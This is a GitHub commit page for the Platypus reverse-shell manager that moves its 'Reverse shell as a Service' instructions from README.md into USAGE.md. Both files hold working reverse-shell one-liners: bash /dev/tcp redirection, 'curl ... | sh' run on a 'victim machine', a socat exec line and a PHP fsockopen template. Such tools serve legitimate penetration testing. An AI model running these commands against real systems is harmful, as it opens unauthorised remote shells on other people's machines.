Skip to content

Commit

Permalink
[+] Update documents
Browse files Browse the repository at this point in the history
  • Loading branch information
WangYihang committed Jan 24, 2021
1 parent 2375f35 commit becb491
Show file tree
Hide file tree
Showing 2 changed files with 23 additions and 20 deletions.
23 changes: 3 additions & 20 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -30,8 +30,6 @@ A modern multiple reverse shell sessions/clients manager via terminal written in
```
git clone https://github.com/WangYihang/Platypus
cd Platypus
go get -u github.com/go-bindata/go-bindata/...
go-bindata -pkg resource -o ./lib/util/resource/resource.go ./lib/runtime/...
go run platypus.go
```
![](figure/install.gif)
Expand Down Expand Up @@ -100,25 +98,10 @@ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.174.132:8080
#### Upload file
![](./figure/upload.gif)

### Other useful feature
### Advanced [USAGE](./USAGE.md)

#### Reverse shell as a Service
> [USAGE](./USAGE.md)
> NOTICE: ONLY WORKS on *NIX
The command `bash -c "bash -i >/dev/tcp/8.8.8.8/1337 0>&1"` is the equivalent of `curl http://192.168.174.132:8080/8.8.8.8/1337 | sh`, this feature provides the capability to redirect new reverse shell to another ip and port with out type the boring reverse shell command.

If you just want to pop up a reverse shell to the listening port of platypus, the parameter (`8.8.8.8/1337`) can be omited, like this:
```bash
curl http://192.168.174.132:8080/ | sh
```
Once the command get executed, the reverse shell session will appear in platypus which is listening on `192.168.174.132:8080`.

#### RESTful API
> [USAGE](./USAGE.md)
> Demonstration is to be done.
* Reverse shell as a Service (RaaS)
* RESTful API

#### Using `VIM` in Reverse Shell (Only on `Linux`)
> Demonstration is to be done.
Expand Down
20 changes: 20 additions & 0 deletions USAGE.md
Original file line number Diff line number Diff line change
@@ -1,5 +1,7 @@
## Reverse shell as a Service

> NOTICE: ONLY WORKS when Platypus runs on *NIX
Platypus is able to multiplex the reverse shell listening port. Port 8080 can receive reverse shell client connection, also there is a Reverse Shell as a Service (RaaS) running on this port.

Assume that you have got an arbitrary RCE on the target application, but the target application will strip the non-alphabet letter like `&`, `>`. then this feature will be useful.
Expand All @@ -8,6 +10,17 @@ To archive this, all you need is to construct a URL that indicates the target.

### Quick start

The command `bash -c "bash -i >/dev/tcp/5.6.7.8/7331 0>&1"` is the equivalent of `curl http://1.2.3.4:1337/5.6.7.8/7331 | sh`, this feature provides the capability to redirect new reverse shell to another ip and port with out type the boring reverse shell command.

If you just want to pop up a reverse shell to the listening port of platypus, the parameter (`1.2.3.4/1337`) can be omited, like this:

```bash
curl http://1.2.3.4:1337/ | sh
```

Once the command get executed, the reverse shell session will appear in platypus which is listening on `1.2.3.4:1337`.


1. Start platypus and listen to any port (eg: 1.2.3.4 1337)
2. Execute `curl http://1.2.3.4:1337 | sh` on the victim machine

Expand All @@ -31,6 +44,13 @@ Currently, platypus support `awk`, `bash`, `go`, `Lua`, `NC`, `Perl`, `PHP`, `py
php -r '$sock=fsockopen("__HOST__",__PORT__);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
```

Then you should run the following command at Platypus project directory and rebuild Platypus.

```bash
go get -u github.com/go-bindata/go-bindata/...
go-bindata -pkg resource -o ./lib/util/resource/resource.go ./lib/runtime/...
```

## RESTful API

* `GET /client` List all online clients
Expand Down

0 comments on commit becb491

Please sign in to comment.